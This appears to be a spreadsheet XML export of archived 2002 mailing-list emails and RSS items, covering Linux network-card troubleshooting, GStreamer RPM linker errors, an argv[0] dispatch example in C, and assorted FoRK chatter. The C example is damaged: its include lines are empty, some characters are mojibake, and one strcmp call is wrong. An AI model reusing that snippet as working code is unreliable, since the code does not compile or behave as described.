    <t>To: webmake-talk@example.sourceforge.net\nFrom: Alan Jackson &lt;ajackson@oplnk.net&gt;\nDate: Sun, 4 Aug 2002 21:25:26 -0500</t>
  </si>
  <si>
    <t>Sun, 4 Aug 2002 21:25:26 -0500</t>
  </si>
  <si>
    <t>Alan Jackson &lt;ajackson@oplnk.net&gt;</t>
  </si>
  <si>
    <t>webmake-talk@example.sourceforge.net</t>
  </si>
  <si>
    <t>[WM] Exclude pages from site map</t>
  </si>
  <si>
    <t>Is there a way to exclude a set of pages from the site map? For each\npage in the site I also create a "printer friendly" page, and I would\nlike to exclude all of those form the sitemap.\n\n-- \n-----------------------------------------------------------------------\n| Alan K. Jackson            | To see a World in a Grain of Sand      |\n| alan@ajackson.org          | And a Heaven in a Wild Flower,         |\n| [URL]www.ajackson.org[/URL]           | Hold Infinity in the palm of your hand |\n| Houston, Texas             | And Eternity in an hour. - Blake       |\n-----------------------------------------------------------------------\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nwebmake-talk mailing list\nwebmake-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>www.ajackson.org http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: cout@eircom.net\nFrom: kevin lyda &lt;kevin+dated+1028918062.7a360a@ie.suberic.net&gt;\nDate: Sun, 4 Aug 2002 19:34:16 +0100</t>
  </si>
  <si>
    <t>Sun, 4 Aug 2002 19:34:16 +0100</t>
  </si>
  <si>
    <t>kevin lyda &lt;kevin+dated+1028918062.7a360a@ie.suberic.net&gt;</t>
  </si>
  <si>
    <t>cout@eircom.net</t>
  </si>
  <si>
    <t>Re: [ILUG] 3c509 &amp; 2.4.19 problems</t>
  </si>
  <si>
    <t>On Sun, Aug 04, 2002 at 06:55:49PM +0100, cout@eircom.net wrote:\n&gt; You need to run the dos setup program for the 3c509 and turn off plug 'n' play in the card's firmware I think you will find.\n\nor you could:\n\n    a) make your lines less then 80 chars.\n    b) not top-post.\n    c) visit [URL]http://www.scyld.com[/URL] and turn off plug and play\n       from a linux setup program.\n    d) all of the above.\n    moron) do none of the above.\n\njust a thought...\n\nkevin\n\n-- \nkevin@suberic.net     that a believer is happier than a skeptic is no more to\nfork()'ed on 37058400    the point than the fact that a drunken man is happier\nmeatspace place: home       than a sober one. the happiness of credulity is a\n[URL]http://ie.suberic.net[/URL]   cheap &amp; dangerous quality -- g.b. shaw\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.scyld.com http://ie.suberic.net http://www.linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: cout@eircom.net\nDate: Sun, 4 Aug 2002 18:55:49 +0100</t>
  </si>
  <si>
    <t>Sun, 4 Aug 2002 18:55:49 +0100</t>
  </si>
  <si>
    <t>You need to run the dos setup program for the 3c509 and turn off plug 'n' play in the card's firmware I think you will find.\n\nBod\n\n&gt; \n&gt; Hi folks,\n&gt; \n&gt; I decided to upgrade the kernel on a machine at home from 2.2.18pre21 to the latest from kernel.org which is 2.4.19.\n&gt; \n&gt; However I have encountered one problem, my network card now dosent work, well kind of dosent work...\n&gt; \n&gt; Instead of one eth0 on IRQ 10 I now get:\n&gt; Aug  4 11:31:51 mira kernel: eth0: 3c5x9 at 0x220, 10baseT port, address  00 10 5a 3e 0e 48, IRQ 5.\n&gt; Aug  4 11:31:51 mira kernel: 3c509.c:1.18 12Mar2001 becker@scyld.com\n&gt; Aug  4 11:31:51 mira kernel: [URL]http://www.scyld.com[/URL]\n&gt; Aug  4 11:31:51 mira kernel: eth1: 3c5x9 at 0x300, 10baseT port, address  00 10 5a be 0e 48, IRQ 10.\n&gt; Aug  4 11:31:51 mira kernel: 3c509.c:1.18 12Mar2001 becker@scyld.com\n&gt; Aug  4 11:31:51 mira kernel: [URL]http://www.scyld.com[/URL]\n&gt; \n&gt; This results in the interface(s) coming up but while packets can go out they can not come in.\n&gt; \n&gt; I've tried not loading the 3c509 mdule on bootup and then `modload 3c509 IRQ=10` bit it still gets loaded as above, on IRQ 5 and 10. On 2.2 it loads to IRQ 10.\n&gt; \n&gt; Anyone got any suggestions on what to do here? Its a debian 3.0 distro. This works fine when booted to 2.2 so the hardware/BIOS etc seem ok, so it seems to be 2.4 spacific. Have I missed some kernel setting?\n&gt; \n&gt; Cheers,\n&gt; ~Al\n&gt; \n&gt; -- \n&gt; Irish Linux Users' Group: ilug@linux.ie\n&gt; [URL]http://www.linux.ie[/URL] for (un)subscription information.\n&gt; List maintainer: listmaster@linux.ie\n&gt; \n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.scyld.com http://www.scyld.com http://www.linux.ie http://www.linux.ie</t>
  </si>
  <si>
    <t>To: "'FoRK'" &lt;fork@spamassassin.taint.org&gt;\nFrom: "Max Dunn" &lt;maxdunn@siliconpublishing.com&gt;\nDate: Sun, 4 Aug 2002 16:39:22 -0700</t>
  </si>
  <si>
    <t>Sun, 4 Aug 2002 16:39:22 -0700</t>
  </si>
  <si>
    <t>"Max Dunn" &lt;maxdunn@siliconpublishing.com&gt;</t>
  </si>
  <si>
    <t>RE: Cancelling earthlink</t>
  </si>
  <si>
    <t>&gt; I'm sure if you call their customer service \n&gt; number they can unsubscribe you.   I took me 4 \n&gt; tries, \n\ntook me 5.\n\n&gt; so make sure you get a confirmation number.  \n\nDoes that help? I had 5 of those. Lovely company...\n\nMax\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: "FoRK" &lt;FoRK@xent.com&gt;\nFrom: "Jim Whitehead" &lt;ejw@cse.ucsc.edu&gt;\nDate: Sun, 4 Aug 2002 15:17:34 -0700</t>
  </si>
  <si>
    <t>Sun, 4 Aug 2002 15:17:34 -0700</t>
  </si>
  <si>
    <t>FYI: WSE 2002</t>
  </si>
  <si>
    <t>FYI, members of this list might be interested in the 4th International\nWorkshop on Web Site Evolution (WSE 2002), being held October 2, 2002, in\nMontreal, Canada.\n\n[URL]http://star.itc.it[/URL]\n\n- Jim\n\n&gt;&gt;From the Web page:\n\n The potential of the Web as a vehicle for offering a variety of services is\nbecoming more apparent as Web sites evolve their contents from static\ninformation to more dynamic and interactive forms. A number of new standards\nand commercial products are emerging, offering a basis for developing\nWeb-based services from dynamic composible resources, extending both the\nrange and scope of services that can be made available through the Web.\n\nThe goal of this one-day workshop is to bring together members of the Web\ndesign, software engineering, and information technology communities to\ndiscuss techniques for migrating to Web services. Architectural styles and\ntool support for service-based Web sites are currently quite diverse.\nExpertise in constructing service-based Web pages is quite limited, and\nexperience accounts are lacking. The explosion of non-traditional computing\nplatforms for browsing the Web, such as PDAs, WAP-enabled phones, and\nInternet appliances, is forcing Web professionals to rethink the separation\nof form from content and the range and scope of services offered via the\nWeb.\n\nWSE 2002 will provide an opportunity for the exchange of information related\nto exciting new research and empirical results in areas including (but not\nlimited to):\n\n*   Migrating to Web services\n*   Web quality determination and improvement through process and product\ncontrol\n*   Enhancing Web sites to make them more accessible, reliable, and usable\n*   Analyzing and reverse-engineering Web site content and structure\n*   Making Web site content available in multiple formats for multiple\nplatforms\n*   Applying traditional software engineering activities such as\narchitecture, metrics, and testing to Web sites\n*   Case studies of large-scale Web site reuse, reengineering, and evolution\n\nWSE 2002 is co-located with the IEEE International Conference on Software\nMaintenance (ICSM 2002). ICSM is the IEEE Computer Society's flagship event\nfocused on the modernization of existing systems. ICSM 2002's theme of\n"maintaining distributed heterogeneous systems" nicely compliments WSE\n2002's overall theme and goals.\n\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://star.itc.it http://xent.com</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Rick Moen &lt;rick@linuxmafia.com&gt;\nDate: Sun, 4 Aug 2002 14:22:43 -0700</t>
  </si>
  <si>
    <t>Sun, 4 Aug 2002 14:22:43 -0700</t>
  </si>
  <si>
    <t>Quoting cout@eircom.net (cout@eircom.net):\n\n&gt; You need to run the dos setup program for the 3c509 and turn off plug\n&gt; 'n' play in the card's firmware I think you will find.\n\nAs Kevin said, the problem can reputedly be solved using Donald Becker's \nLinux-native utilities for the 3C5X9 series.  Turn off PnP, and then set \nthe IRQ and I/O base address as required.  Make sure those are also\nmade available in the motherboard BIOS Setup program to "Legacy ISA\ndevices" or whatever it's called, there.\n\n-- \nCheers,              "It ain't so much the things we don't know that get us\nRick Moen            in trouble.  It's the things we know that ain't so."\nrick@linuxmafia.com             -- Artemus Ward (1834-67), U.S. journalist\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ILUG &lt;ilug@linux.ie&gt;\nFrom: David Neary &lt;dneary@wanadoo.fr&gt;\nDate: Sun, 4 Aug 2002 13:40:33 +0200</t>
  </si>
  <si>
    <t>Sun, 4 Aug 2002 13:40:33 +0200</t>
  </si>
  <si>
    <t>Re: [ILUG] One Command -- Four Types</t>
  </si>
  <si>
    <t>SoloCDM wrote: &gt; How are there four (/bin/dnsdomainname /bin/domainname &gt; /bin/nisdomainname /bin/ypdomainname) different types of hostname &gt; links with their own separate options? The program has different behaviour depending on the value of argv[0], probably... here's a simple example... #include  #include  #include  long int add(long int a, long int b) {   return a+b; } long int subtract(long int a, long int b) {   return a-b; } int main(int argc, char **argv) {   long int a, b; /* Operands */   long int (*operation)(long int a, long int b);   char *progname, *marker;   if(argc != 3)   {     fprintf(stderr, "Usage: %s [int1] [int2]\n", argv[0]);     exit(1);   }   progname = strrchr(argv[0], '/');   if(progname == NULL)     progname = argv[0];   else     progname ++; /* Skip past the '/' */      if(strcmp(progname, "add") == 0)   {     operation = add;   }   else if (strcmp(progname, subtract) == 0)   {     operation = subtract;   }   else   {     fprintf(stderr, "Program called with invalid "             "name %s. Quitting.\n", argv[0]);     exit(1);   }   a = strtol(argv[1], â–®, 0); /* Use base 16 for args                                     * starting 0x, and base 8 for                                      * args starting 0 */   if(*marker != '\0')   {     fprintf(stderr, "Invalid character %c in argument %s.\n",             *marker, argv[1]);     exit(1);   }   b = strtol(argv[2], â–®, 0); /* Use base 16 for args                                     * starting 0x, and base 8 for                                      * args starting 0 */   if(*marker != '\0')   {     fprintf(stderr, "Invalid character %c in argument %s.\n",             *marker, argv[2]);     exit(1);   }      printf("%ld %c %ld = %ld\n",            a,            (operation == add)?'+':'-',            b,            operation(a, b));              return 0; } Say that's in operation.c, compile it using  gcc -ansi -pedantic -Wall -W -O2 -o add operation.c and then  ln add subtract and run both, with appropriate arguments. --         David Neary,     Marseille, France   E-Mail: bolsh@gimp.org --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Albert White &lt;albertw@netsoc.ucd.ie&gt;\nDate: Sun, 4 Aug 2002 13:14:27 +0100</t>
  </si>
  <si>
    <t>Sun, 4 Aug 2002 13:14:27 +0100</t>
  </si>
  <si>
    <t>Albert White &lt;albertw@netsoc.ucd.ie&gt;</t>
  </si>
  <si>
    <t>[ILUG] 3c509 &amp; 2.4.19 problems</t>
  </si>
  <si>
    <t>Hi folks,\n\nI decided to upgrade the kernel on a machine at home from 2.2.18pre21 to the latest from kernel.org which is 2.4.19.\n\nHowever I have encountered one problem, my network card now dosent work, well kind of dosent work...\n\nInstead of one eth0 on IRQ 10 I now get:\nAug  4 11:31:51 mira kernel: eth0: 3c5x9 at 0x220, 10baseT port, address  00 10 5a 3e 0e 48, IRQ 5.\nAug  4 11:31:51 mira kernel: 3c509.c:1.18 12Mar2001 becker@scyld.com\nAug  4 11:31:51 mira kernel: [URL]http://www.scyld.com[/URL]\nAug  4 11:31:51 mira kernel: eth1: 3c5x9 at 0x300, 10baseT port, address  00 10 5a be 0e 48, IRQ 10.\nAug  4 11:31:51 mira kernel: 3c509.c:1.18 12Mar2001 becker@scyld.com\nAug  4 11:31:51 mira kernel: [URL]http://www.scyld.com[/URL]\n\nThis results in the interface(s) coming up but while packets can go out they can not come in.\n\nI've tried not loading the 3c509 mdule on bootup and then `modload 3c509 IRQ=10` bit it still gets loaded as above, on IRQ 5 and 10. On 2.2 it loads to IRQ 10.\n\nAnyone got any suggestions on what to do here? Its a debian 3.0 distro. This works fine when booted to 2.2 so the hardware/BIOS etc seem ok, so it seems to be 2.4 spacific. Have I missed some kernel setting?\n\nCheers,\n~Al\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.scyld.com http://www.scyld.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "Mr. FoRK" &lt;fork_list@hotmail.com&gt;\nDate: Sun, 4 Aug 2002 13:06:08 -0700</t>
  </si>
  <si>
    <t>Sun, 4 Aug 2002 13:06:08 -0700</t>
  </si>
  <si>
    <t>Re: Using hosts file to rid yourself of popup ads</t>
  </si>
  <si>
    <t>Okay okay... after reading further I realized this wasn't all that great.... thanks for the feedback anyway. ----- Original Message ----- From: "Joseph S. Barrera III"  To: "Mr. FoRK"  Cc:  Sent: Saturday, August 03, 2002 10:31 PM Subject: Re: Using hosts file to rid yourself of popup ads &gt; Mr. FoRK wrote: &gt; &gt; Don't know if everybody knows this trick... &gt; &gt; Yes. They do. &gt; &gt; &gt; &gt; Because we're inherently lazy, this works for windows only, &gt; &gt; Huh? Oh, that's right, Unix picked up the idea of /etc/hosts &gt; from Windows. I keep forgetting. &gt; &gt;  &gt; &gt; don't use it on a mac! &gt; &gt; Especially macs running unix (see above). &gt; &gt; &gt; &gt; We didn't write this file and do not provide &gt;  &gt; &gt; support for it's use. &gt; &gt; We don't even know how to use the fucking English language. &gt; -- &gt; What security level comes after "Totally Apeshit"? &gt;      -- [URL]http://www.mnftiu.cc[/URL] &gt; &gt; &gt; [URL]http://xent.com[/URL] &gt; [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.mnftiu.cc http://xent.com http://xent.com</t>
  </si>
  <si>
    <t>To: deedsmis@aculink.net, ilug@linux.ie\nFrom: lbedford@lbedford.org\nDate: Sun, 4 Aug 2002 12:12:01 +0100</t>
  </si>
  <si>
    <t>Sun, 4 Aug 2002 12:12:01 +0100</t>
  </si>
  <si>
    <t>lbedford@lbedford.org</t>
  </si>
  <si>
    <t>On Sun, Aug 04, 2002 at 04:36:11AM -0600, SoloCDM wrote:\n&gt; I tried several ways to force the command ln to create a link with\n&gt; an option attached . . . it wouldn't work.\n&gt; \n&gt; How are there four (/bin/dnsdomainname /bin/domainname\n&gt; /bin/nisdomainname /bin/ypdomainname) different types of hostname\n&gt; links with their own separate options?\n&gt; \nThere's a switch statement in the program on argv[0].\n\nIt's not including any options in the link.\n\nL.\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ILUG (Request) &lt;ilug@linux.ie&gt;\nFrom: SoloCDM &lt;deedsmis@aculink.net&gt;\nDate: Sun, 4 Aug 2002 04:36:11 -0600</t>
  </si>
  <si>
    <t>Sun, 4 Aug 2002 04:36:11 -0600</t>
  </si>
  <si>
    <t>[ILUG] One Command -- Four Types</t>
  </si>
  <si>
    <t>I tried several ways to force the command ln to create a link with\nan option attached . . . it wouldn't work.\n\nHow are there four (/bin/dnsdomainname /bin/domainname\n/bin/nisdomainname /bin/ypdomainname) different types of hostname\nlinks with their own separate options?\n\n-- \nNote: When you reply to this message, please include the mailing\n      list and/or newsgroup address and my email address in To:\n\n*********************************************************************\nSigned,\nSoloCDM\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Elias &lt;elias@cse.ucsc.edu&gt;, fork@spamassassin.taint.org\nFrom: Udhay Shankar N &lt;udhay@pobox.com&gt;\nDate: Sun, 29 Sep 2002 22:43:04 +0530</t>
  </si>
  <si>
    <t>Sun, 29 Sep 2002 22:43:04 +0530</t>
  </si>
  <si>
    <t>Elias &lt;elias@cse.ucsc.edu&gt;, fork@spamassassin.taint.org</t>
  </si>
  <si>
    <t>Re: Content management for MP3s</t>
  </si>
  <si>
    <t>At 09:02 AM 9/29/02 -0700, Elias wrote:\n\n&gt;I'm about to undertake a massive project to index/catalog well over one \n&gt;thousand CDs that have been ripped to MP3 and set up a server to stream \n&gt;them to different rooms in the house. (Yes, I own them all, no I'm not \n&gt;broadcasting them to the 'net.) Can anyone give me some recommendations as \n&gt;to what (free? opensource?) software is best suited for this task? I know \n&gt;there are a few FoRKs out there who have tackled this problem before...\n\nSee if [URL]http://www.jwz.org[/URL] meets your needs.\n\nUdhay\n\n-- \n((Udhay Shankar N)) ((udhay @ pobox.com)) (([URL]www.digeratus.com[/URL]</t>
  </si>
  <si>
    <t>http://www.jwz.org www.digeratus.com</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Thomas Vander Stichele &lt;thomas@urgent.rug.ac.be&gt;\nDate: Sun, 29 Sep 2002 21:38:46 +0200 (CEST)</t>
  </si>
  <si>
    <t>Sun, 29 Sep 2002 21:38:46 +0200 (CEST)</t>
  </si>
  <si>
    <t>Re: [gst-devel] Red Hat 8.0</t>
  </si>
  <si>
    <t>&gt; &gt; &gt; &gt; INFO (15299: 0)gst_xml_registry_rebuild:1555: Plugin  &gt; &gt; &gt; &gt; /usr/lib/gst/libgstwincodec.so failed to load: Error loading plugin  &gt; &gt; &gt; &gt; /usr/lib/gst/libgstwincodec.so, reason: /usr/lib/libaviplay-0.7.so.0: &gt; &gt; &gt; &gt;  &gt; &gt; &gt; &gt; undefined symbol: _ZTVN10__cxxabiv120__si_class_type_infoE &gt; &gt;  &gt; &gt; &gt; Are you using the same version of GCC to compile the plugin as its C++ &gt; &gt; &gt; dependencies? &gt; &gt;  &gt; &gt; Yes, I am.  Everything is built inside a chroot.  I think it isn't &gt; &gt; linking to a lib somewhere, I'm just not sure what lib it should &gt; &gt; preloading here.  Anyway to find out which one it is ? &gt;  &gt; Looks like a problem with the avifile you've rebuilt... I've been unable to &gt; recompile successfully the latest version on 8.0 :-/ Hm, it is built inside the same chroot.  aviplay works (well it would if I  had XV, I get X errors ;)).  But it doesn't complain about linker  problems.  So I suppose my avifile library on itself is compiled ok. Sigh, avifile is one of the worst packages out there, in all aspects -  naming of tarballs, not ever releasing an actual package, versioning of  libraries, API stability, ... Thomas  --  The Dave/Dina Project : future TV today ! - [URL]http://davedina.apestaart.org[/URL] &lt;-*-                      -*-&gt; cos when i needed someone you left me floored the feeling is gone i can't let go you know that i'd change if i had the love it takes &lt;-*- thomas@apestaart.org -*-&gt; URGent, the best radio on the Internet - 24/7 ! - [URL]http://urgent.rug.ac.be[/URL] _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Sun, 29 Sep 2002 21:16:30 +0200</t>
  </si>
  <si>
    <t>Sun, 29 Sep 2002 21:16:30 +0200</t>
  </si>
  <si>
    <t>Once upon a time, Thomas wrote : &gt; &gt; On Sun, 29 Sep 2002, Thomas Vander Stichele wrote: &gt; &gt;  &gt; &gt; &gt; INFO (15299: 0)gst_xml_registry_rebuild:1555: Plugin  &gt; &gt; &gt; /usr/lib/gst/libgstwincodec.so failed to load: Error loading plugin  &gt; &gt; &gt; /usr/lib/gst/libgstwincodec.so, reason: /usr/lib/libaviplay-0.7.so.0: &gt; &gt; &gt;  &gt; &gt; &gt; undefined symbol: _ZTVN10__cxxabiv120__si_class_type_infoE &gt;  &gt; &gt; Are you using the same version of GCC to compile the plugin as its C++ &gt; &gt; dependencies? &gt;  &gt; Yes, I am.  Everything is built inside a chroot.  I think it isn't &gt; linking to a lib somewhere, I'm just not sure what lib it should &gt; preloading here.  Anyway to find out which one it is ? Looks like a problem with the avifile you've rebuilt... I've been unable to recompile successfully the latest version on 8.0 :-/ Matthias --  Matthias Saou                                World Trade Center -------------                                Edificio Norte 4 Planta System and Network Engineer                  08039 Barcelona, Spain Electronic Group Interactive                 Phone : +34 936 00 23 23 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: ERDI Gergo &lt;cactus@cactus.rulez.org&gt;\nFrom: Thomas Vander Stichele &lt;thomas@urgent.rug.ac.be&gt;\nDate: Sun, 29 Sep 2002 20:57:40 +0200 (CEST)</t>
  </si>
  <si>
    <t>Sun, 29 Sep 2002 20:57:40 +0200 (CEST)</t>
  </si>
  <si>
    <t>ERDI Gergo &lt;cactus@cactus.rulez.org&gt;</t>
  </si>
  <si>
    <t>Hi, &gt; On Sun, 29 Sep 2002, Thomas Vander Stichele wrote: &gt;  &gt; &gt; INFO (15299: 0)gst_xml_registry_rebuild:1555: Plugin  &gt; &gt; /usr/lib/gst/libgstwincodec.so failed to load: Error loading plugin  &gt; &gt; /usr/lib/gst/libgstwincodec.so, reason: /usr/lib/libaviplay-0.7.so.0:  &gt; &gt; undefined symbol: _ZTVN10__cxxabiv120__si_class_type_infoE &gt; Are you using the same version of GCC to compile the plugin as its C++ &gt; dependencies? Yes, I am.  Everything is built inside a chroot.  I think it isn't linking  to a lib somewhere, I'm just not sure what lib it should preloading here.   Anyway to find out which one it is ? Thomas  --  The Dave/Dina Project : future TV today ! - [URL]http://davedina.apestaart.org[/URL] &lt;-*-                      -*-&gt; You came in just like smoke With a little come on come on  come on in your walk come on &lt;-*- thomas@apestaart.org -*-&gt; URGent, the best radio on the Internet - 24/7 ! - [URL]http://urgent.rug.ac.be[/URL] _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: gstreamer-devel@example.sourceforge.net\nFrom: Thomas Vander Stichele &lt;thomas@urgent.rug.ac.be&gt;\nDate: Sun, 29 Sep 2002 19:29:58 +0200 (CEST)</t>
  </si>
  <si>
    <t>Sun, 29 Sep 2002 19:29:58 +0200 (CEST)</t>
  </si>
  <si>
    <t>gstreamer-devel@example.sourceforge.net</t>
  </si>
  <si>
    <t>Red Hat 8.0</t>
  </si>
  <si>
    <t>Hi, Red Hat 8.0 is released tomorrow (monday).  I took some time out to make  RPMs of GStreamer for it. All of them (core, plugins and player) have been uploaded to the apt  repository in a new "redhat-80-i386" directory. The repository for dependencies is again called "deps", and the one for  the gstreamer rpms is "redhat", because this time around the base distro  contains all the necessary packages. A screenshot of Red Hat 8.0 running gst-player is up at [URL]http://thomas.apestaart.org[/URL] Here are some known issues with the resulting rpms : a) gstreamer-nautilus isn't built, the package got renamed and I don't  have a -devel package for it yet b) the c++ plugins have problems which I haven't been able to resolve. Here are the errors: INFO (15299: 0)gst_xml_registry_rebuild:1555: Plugin  /usr/lib/gst/libgstwincodec.so failed to load: Error loading plugin  /usr/lib/gst/libgstwincodec.so, reason: /usr/lib/libaviplay-0.7.so.0:  undefined symbol: _ZTVN10__cxxabiv120__si_class_type_infoE Plugin /usr/lib/gst/libgstwincodec.so failed to load DEBUG(15299: 0)gst_plugin_load_plugin:161: attempt to load plugin  "/usr/lib/gst/libgstmodplug.so" INFO (15299: 0)gst_xml_registry_rebuild:1555: Plugin  /usr/lib/gst/libgstmodplug.so failed to load: Error loading plugin  /usr/lib/gst/libgstmodplug.so, reason: /usr/lib/gst/libgstmodplug.so:  undefined symbol: __gxx_personality_v0 I'm not sure how to fix this; running strings on the libs in /usr/lib  reveals that there are other libs that have these symbols, so there must  be something straightforward that should fix this. If anyone has a suggestion, please share ;) Thomas --  The Dave/Dina Project : future TV today ! - [URL]http://davedina.apestaart.org[/URL] &lt;-*-                      -*-&gt; Kiss me please kiss me Kiss me out of desire baby not consolation Oh you know it makes me so angry cause I know that in time I'll only make you cry &lt;-*- thomas@apestaart.org -*-&gt; URGent, the best radio on the Internet - 24/7 ! - [URL]http://urgent.rug.ac.be[/URL] _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://thomas.apestaart.org http://davedina.apestaart.org http://urgent.rug.ac.be http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: social@linux.ie\nFrom: &lt;isu@eircom.net&gt;\nDate: Sun, 29 Sep 2002 19:11:17 +0100</t>
  </si>
  <si>
    <t>Sun, 29 Sep 2002 19:11:17 +0100</t>
  </si>
  <si>
    <t>&lt;isu@eircom.net&gt;</t>
  </si>
  <si>
    <t>[ILUG-Social] Re: Important - reenactor insurance needed</t>
  </si>
  <si>
    <t>My gut reaction would be to tell them to go and shite, but this might not help to solve the problem. People who do horsey gigs get insurance because they can prove that they are 'expert'. They can then get a quote. What about finding out what they are prepared to insure, and then tell them that you are pulling in your horns and will do what you are insured to do, and make sure no one chops up any one else.\nBest of luck\nIain\n-- \nIrish Linux Users' Group Social Events: social@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: discussion@mlug.missouri.edu, &lt;nolug@nolug.org&gt;, &lt;Fork@xent.com&gt;\nFrom: Michael &lt;mogmios@mlug.missouri.edu&gt;\nDate: Sun, 29 Sep 2002 13:43:35 -0500 (CDT)</t>
  </si>
  <si>
    <t>Sun, 29 Sep 2002 13:43:35 -0500 (CDT)</t>
  </si>
  <si>
    <t>discussion@mlug.missouri.edu, &lt;nolug@nolug.org&gt;, &lt;Fork@xent.com&gt;</t>
  </si>
  <si>
    <t>A moment of silence for the First Amendment (fwd)</t>
  </si>
  <si>
    <t>[URL]http://www.post-gazette.com[/URL]</t>
  </si>
  <si>
    <t>http://www.post-gazette.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Sun, 29 Sep 2002 08:01:38 -0000</t>
  </si>
  <si>
    <t>Sun, 29 Sep 2002 08:01:38 -0000</t>
  </si>
  <si>
    <t>Mice born from rat-matured eggs</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8341698,1440/\nDate: Not supplied\n\nUsing one species to develop the eggs of another could in future help \nendangered species and even women</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: ask &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Sun, 29 Sep 2002 08:01:31 -0000</t>
  </si>
  <si>
    <t>Sun, 29 Sep 2002 08:01:31 -0000</t>
  </si>
  <si>
    <t>ask &lt;rssfeeds@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>New iBooks and PowerBooks</t>
  </si>
  <si>
    <t>URL: [URL]http://www.askbjoernhansen.com[/URL]\nDate: 2002-09-07T06:10:55-08:00\n\nI am thinking about getting a new Mac. Not any good reason for it though. I'll \ntry to wait it out for one of the new iBooks rumored for next spring. No new \nPowerBook next month if new models come out. No. I said no! Stop thinking about \nit. Don't do it. I said don't do it. No. No, it's a really bad idea. Don't. \nGeez. Stop it! No, not even if it has an even cooler monitor. Or a...</t>
  </si>
  <si>
    <t>http://www.askbjoernhansen.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: ask &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Sun, 29 Sep 2002 08:01:26 -0000</t>
  </si>
  <si>
    <t>Sun, 29 Sep 2002 08:01:26 -0000</t>
  </si>
  <si>
    <t>Oracle of Google</t>
  </si>
  <si>
    <t>URL: [URL]http://www.askbjoernhansen.com[/URL]\nDate: 2002-09-12T17:08:46-08:00\n\nThe Oracle of Google can answer multiple choice questions amazingly well ... \nWho is the author of Perl?, What family lives next door to the Simpsons?. As \nthe author points out on the about page; this thing would be really useful in a \n"Who Wants To Be a Millionaire" type contest. =)...</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: ask &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Sun, 29 Sep 2002 08:01:24 -0000</t>
  </si>
  <si>
    <t>Sun, 29 Sep 2002 08:01:24 -0000</t>
  </si>
  <si>
    <t>Carcooning</t>
  </si>
  <si>
    <t>URL: [URL]http://www.askbjoernhansen.com[/URL]\nDate: 2002-09-12T23:03:40-08:00\n\nIf you've been in Los Angeles for long enough to read this sentence, chances \nare you've spent more time stuck in traffic than you would care to consider. \nThat annoying fact of Southern California life is only going to become more \nannoying and more of a factor with time, which is the point of "Car Trek," \ntonight's edition of "By the Year 2000" at 7:30 on KCET (Channel 28) [which] \nalso looks at the phenomena of "carcooning" in which...</t>
  </si>
  <si>
    <t>YOUR a STUPID Idj0t</t>
  </si>
  <si>
    <t>URL: [URL]http://www.askbjoernhansen.com[/URL]\nDate: 2002-09-20T16:13:37-08:00\n\nJeremy writes about people who ignore basic language rules I entirely agree \nwith him. Writing "how r u 2day." is the best way to make me shift my attention \nand respect away from you really fast. Another pet peeve: I have only been \nspeaking English on a regular basis for a bit more than three years, and even I \ncan grok the difference between "you are" and "your". As mjd wrote on clpm and \nsaid in the YAPC movie: "You...</t>
